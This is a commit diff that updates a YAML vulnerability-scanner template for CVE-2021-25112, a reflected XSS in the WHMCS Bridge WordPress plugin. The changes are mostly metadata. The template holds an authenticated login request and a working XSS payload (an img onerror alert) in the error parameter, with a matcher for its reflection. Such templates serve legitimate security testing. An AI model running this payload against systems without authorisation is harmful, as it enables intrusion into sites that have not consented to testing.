Update CVE-2021-25112.yaml
parent
88f642a48a
commit
0a6f5c57ef
|
@ -1,13 +1,15 @@
|
|||
id: CVE-2021-25112
|
||||
|
||||
info:
|
||||
name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
|
||||
name: WHMCS Bridge < 6.4b - Cross-Site Scripting (XSS)
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
|
||||
description: |
|
||||
The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
|
||||
tags: wordpress,wp-plugin,authenticated,whmcs,xss
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25112
|
||||
tags: wordpress,wp-plugin,wp,authenticated,whmcs,xss
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -19,6 +21,7 @@ requests:
|
|||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -30,7 +33,6 @@ requests:
|
|||
part: body
|
||||
words:
|
||||
- "<strong><img src onerror=alert(document.domain)></strong>"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
Loading…
Reference in New Issue